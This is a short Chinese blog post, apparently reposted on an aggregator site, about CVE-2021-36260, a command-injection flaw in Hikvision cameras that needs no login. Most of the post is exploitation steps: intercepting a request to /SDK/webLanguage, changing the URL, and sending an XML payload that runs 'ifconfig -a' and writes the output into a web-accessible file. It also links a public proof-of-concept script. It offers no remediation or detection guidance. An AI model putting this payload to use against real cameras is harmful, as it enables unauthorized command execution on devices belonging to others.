热门标签
热门文章
- 1ABAP function module 的使用_abap module
- 2FPN(特征金字塔)-pytorch实践
- 3Hadoop 大数据生态框架--总述_数字生态系统的架构图
- 4element 项目全屏功能_elementplus全屏
- 5无线远距离WiFi模块图传技术,无人机智能安防预警应用_无线远距离图传
- 6SnailSVN Pro Mac:功能强大的SVN客户端,助您高效管理代码版本控制_mac svn客户端
- 7基于Matlab的无人船局部避碰算法仿真平台_无人船控制仿真程序
- 8论文笔记:Retrieval-Augmented Generation forAI-Generated Content: A Survey_retrieval-augmented generation for ai-generated co
- 9PO模式
- 10Dataphin核心功能(四):安全——基于数据权限分类分级和敏感数据保护,保障企业数据安全_开源数据安全管理
当前位置: article > 正文
海康威视摄像头命令注入 CVE-2021-36260_cve-2021-36260.py
作者:菜鸟追梦旅行 | 2024-05-08 00:30:48
赞
踩
cve-2021-36260.py
记录工作中发现的问题
此漏洞无需账号密码就可以利用
先访问ip:port//SDK/webLanguage ,用burpsuite抓包
修改url 为 /x,
- #payload:
- <?xml version='1.0'encoding='UTF-8'?>
- <language>
- $(ifconfig -a > webLib/x.asp)
- </language>
也可以用poc:CVE-2021-36260/CVE-2021-36260.py at main · Aiminsun/CVE-2021-36260 · GitHub
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/551964
推荐阅读
相关标签
